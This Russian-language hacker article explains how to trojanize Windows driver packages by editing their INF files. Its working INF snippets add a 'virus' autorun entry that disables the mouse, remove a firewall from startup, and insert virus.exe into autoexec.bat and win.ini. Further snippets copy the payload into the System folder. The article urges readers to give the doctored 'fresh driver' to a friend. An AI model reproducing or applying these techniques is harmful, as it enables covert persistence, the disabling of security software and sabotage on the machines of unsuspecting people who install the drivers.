Социальный фактор

Ничто так не интересует человека, как
лазание по чужому компьютеру. Особенно если
жертва ни о чем не догадывается 🙂 Но в последнее время люди начали боятся троянов,
как известно выполняемых в виде экзешников! И закачать свежие PWL с чужого винта становится все труднее и труднее… Наблюдая за всем этим процессом я заметил, что никто не боится драйверов. В день сотни людей качают дрова с левых сайтов и все ОК. Хмммм…
Странно, почему считается если нет exe-файла, то
и угрозы нет?

Скрытая угроза

Почему я заговорил о драйверах? Все дело в том, что Windows если устанавливает
какой-то драйвер, то запускает вовсе не исполняемый файл.
Вся информация об установке берется из INF файла. Этот файл обычный
— текстовый, его структура напоминает структуру INI файла. Давайте рассмотрим простой пример. Простой INF, который пропишет в автозагрузку выключение мышки 🙂

[version]
signature=»$CHICAGO$»

; Функция AddReg — добавление в реестр. 
; В Add.Reg указаны переменные которые следует изменить/создать
[DefaultInstall]
AddReg=Add.Reg

;Структура дынных — Ключ, «раздел», «переменная»,
тип, «значение»
[Add.Reg]
HKLM,»SOFTWARE\Microsoft\Windows\CurrentVersion\Run»,»virus»,
0,»rundll mouse.exe,disable»

А теперь представьте, что вы модифицировали к примеру драйвер на видеокарту, добавив несколько строк 🙂 У вас выйдет ультра-модный драйвер для видюхи, который в придачу вырубает мышь! Дайте
свежий драйверок своему другу 🙂

Вот еще один пример. Мы знаем что на компьютере
стоит брандмауэер. Он загружается с реестра под именем «firewall-SUPER». Наша задача удалить его с автозагрузки… Модифицируем некий драйвер приводя его к виду:

[version]
signature=»$CHICAGO$»

; Функция DelReg описана в разделе Del.Reg
[DefaultInstall]
DelReg=Del.Reg

; Структура практически та же
[Del.Reg]
HKLM,»SOFTWARE\Microsoft\Windows\CurrentVersion\Run», «firewall-SUPER»

Но мы можем совмещать нужные нам действия. Вот так, например, можно выполнить и копирование и удаление с реестра:

[version]
signature=»$CHICAGO$»

[DefaultInstall]
AddReg=Add.Reg
DelReg=Del.Reg

[Add.Reg]
HKLM,»SOFTWARE\Microsoft\Windows\CurrentVersion\Run»,»virus»,
0,»rundll mouse.exe,disable»

[Del.Reg]
HKLM,»SOFTWARE\Microsoft\Windows\CurrentVersion\Run», «firewall-SUPER»

Теперь надеюсь основное понятно. Приступим к вскрытию…

Работа с диском

Что прекрасно так это то, что мы можем вносить изменения в файлы копировать их, удалять, etc. Допустим нам нужно загрузится еще в DOS-е чтобы пропатчить Windows. Без проблем! Вот пример:

[version]
signature=»$CHICAGO$»

[DefaultInstall]
UpdateAutoBat=Update.AutoBat

[Update.AutoBat]
CmdAdd=VIRUS.EXE 

Этим мы добавили вызов VIRUS.EXE еще до винды. Для удаления некой строки нужно указать
команду «CmdAdd» и имя проги. А если тебе надо внести некие изменения в
Win.ini/System.ini, то тут прокатит такой способ:

[version]
signature=»$CHICAGO$»

[DefaultInstall]
UpdateInis=Update.Inis

; Структура — изменяемый_INI_файл, раздел, «ключ=значение»
[Update.Inis]
win.ini, windows,, «load=virus.exe»

Кому нужно что-нибудь удалить? Вам? Ну тогда держите:

[version]
signature=»$CHICAGO$»

[DefaultInstall]
DelFiles=Delete.List

[Delete.List]
virus.exe,,

Эта конструкция удалит файл virus.exe с папки windows/system. А следующая его туда скопирует:

[version]
signature=»$CHICAGO$»

;Указываем, что копировать надо в папку System. Ее ID=11
[DestinationDirs]
DefaultDestDir = 11

;Наша директория имеет ID=1
[SourceDisksNames]
1=»»,,0

;Копируем virus.exe с директории ID=1 (а это текущий каталог)
[SourceDisksFiles]
virus.exe=1

[DefaultInstall]
CopyFiles=Files.Copy

;В директорию у которой ID=11 (System)
[Files.Copy]
virus.exe 

EOF

Все достаточно просто, нужно только потренироваться. Большое количество INF файлов хранится в c:\windows\inf. Там вы можете найти много простых файлов, которые послужат примером. Теперь владея основами строения INF файлов можно модифицировать любой драйвер под свои нужды. Согласитесь, достаточно мощное орудие в умных руках. Причем можно модифицировать и инсталлятор винды, и именно так делают лайтовые версии…

P.S.: А ты когда в последний раз устанавливал дрова на свою звуковуху? 🙂

Оставить мнение

Check Also

Жизнь без антивируса. Как побороть малварь голыми руками и обезопасить себя на будущее

На вопрос «Какой антивирус вы используете на своей виндовой машине?» многие безопасники (в…